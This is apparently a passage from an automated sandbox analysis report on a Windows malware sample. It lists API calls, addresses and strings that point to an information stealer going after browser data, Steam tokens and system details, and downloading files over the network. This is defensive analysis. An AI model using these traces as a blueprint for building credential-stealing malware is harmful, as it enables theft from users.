                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425E0C,?,?,?,00425BF3,00000000), ref: 00409270
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409437
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040944B
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 004094CD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3423466546-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00410310
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041034B
                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 0041035C
                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(?,00000128), ref: 004103C4
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 004103D1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 599723951-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00402518
                                                                                                                                                                                                                                                                    • Part of subcall function 00402484: memset.MSVCRT ref: 004024A9
                                                                                                                                                                                                                                                                    • Part of subcall function 00402484: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024CF
                                                                                                                                                                                                                                                                    • Part of subcall function 00402484: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024E9
                                                                                                                                                                                                                                                                  • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 0040252D
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402538
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040253F
                                                                                                                                                                                                                                                                    • Part of subcall function 00402330: ??_U@YAPAXI@Z.MSVCRT ref: 004023B5
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00402568
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3248666761-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040D70D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,00425C1E,00425C1B,?,?,?), ref: 0040D757
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: _EH_prolog.MSVCRT ref: 0040C1DF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C232
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: memcmp.MSVCRT ref: 0040C270
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                                  • String ID: #$Opera GX
                                                                                                                                                                                                                                                                  • API String ID: 2375657845-1046280356
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00413320
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041333D
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413401
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrlen
                                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                                  • API String ID: 2133942097-2861137601
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00413025
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: _EH_prolog.MSVCRT ref: 00404F6D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FD0
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: StrCmpCA.SHLWAPI(?), ref: 00404FE4
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405007
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 0040503D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405061
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040506C
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040508A
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413083
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                  • API String ID: 1120091252-2579291623
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,*JA), ref: 00410FFF
                                                                                                                                                                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041101A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411021
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                  • String ID: *JA
                                                                                                                                                                                                                                                                  • API String ID: 3183270410-3252079789
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00413455: _EH_prolog.MSVCRT ref: 0041345A
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004145A2
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2678630583-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266C4), ref: 0040FE73
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266C4,00000000,?), ref: 0040FE7A
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE98
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FEB4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3676486918-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9c49e4bc5763ad4850af08873979d77f6a9921c9032cad3f6d1d02449519d482
                                                                                                                                                                                                                                                                  • Instruction ID: dad440606e4edf0a1e1e8460a984b7ff4329a715c3c2c5110655c0acc9f42295
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c49e4bc5763ad4850af08873979d77f6a9921c9032cad3f6d1d02449519d482
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0547A240248FFEB105BD1DD0EF9A7A7EEB46B00F101025FB01E91A0DBB159849B60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ^%@$^%@
                                                                                                                                                                                                                                                                  • API String ID: 0-910765052
                                                                                                                                                                                                                                                                  • Opcode ID: e68f0b5b1e6d13781cc30a7435e007b657b5a8620a47c4ab08c57cdd3d737519
                                                                                                                                                                                                                                                                  • Instruction ID: 26dc63eb9ce11a25a12add1a48e2b40ffc468f06084f3509c1eb81c183aeb80b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e68f0b5b1e6d13781cc30a7435e007b657b5a8620a47c4ab08c57cdd3d737519
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F94139715002299FCB01CF69D8806DD77B5FF89318F1484BADC55E7391C7B86982CB94
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041461F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004265A3), ref: 00414670
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Soft\Steam\steam_tokens.txt, xrefs: 00414688
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                                                                  • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                  • API String ID: 40794102-3507145866
                                                                                                                                                                                                                                                                  • Opcode ID: ff45fa44cfa1e4fdb43f277490c15af90d458476ae0314ca906f4c666bf54dd7
                                                                                                                                                                                                                                                                  • Instruction ID: 7240e2f4b6b6f9ef8787d3a9792356a2d8f4ce3c4f9df371fa985cbdc73882ef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff45fa44cfa1e4fdb43f277490c15af90d458476ae0314ca906f4c666bf54dd7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB214471900248AACF14EBA5C956BDDBB78AF19318F10817EE406725D2DB7C1B48CA66
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040721E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407455
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407469
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3193997572-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004166E2
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00416724
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00416743
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: _EH_prolog.MSVCRT ref: 004163B8
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 004163D8
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindFirstFileA.KERNEL32(?,?), ref: 004163EF
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,00426908), ref: 0041640C
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416426
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 0041644A
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: StrCmpCA.SHLWAPI(?,0042656D), ref: 0041645B
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 00416478
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: PathMatchSpecA.SHLWAPI(?,?), ref: 0041649F
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 004164CB
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,00426924), ref: 004164DD
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 004164ED
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,00426928), ref: 004164FF
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: lstrcat.KERNEL32(?,?), ref: 00416513
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: wsprintfA.USER32 ref: 0041648C
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindNextFileA.KERNEL32(00000000,?), ref: 004166AE
                                                                                                                                                                                                                                                                    • Part of subcall function 004163B3: FindClose.KERNEL32(00000000), ref: 004166BD
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 25485560-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411EA3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: _EH_prolog.MSVCRT ref: 00404E0D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E5C
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: StrCmpCA.SHLWAPI(?), ref: 00404E76
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E9A
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404F06
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: CloseHandle.KERNEL32(?,?,00000400), ref: 00404F20
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetCloseHandle.WININET(00000000), ref: 00404F27
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: InternetCloseHandle.WININET(?), ref: 00404F30
                                                                                                                                                                                                                                                                    • Part of subcall function 00404E08: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EE2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
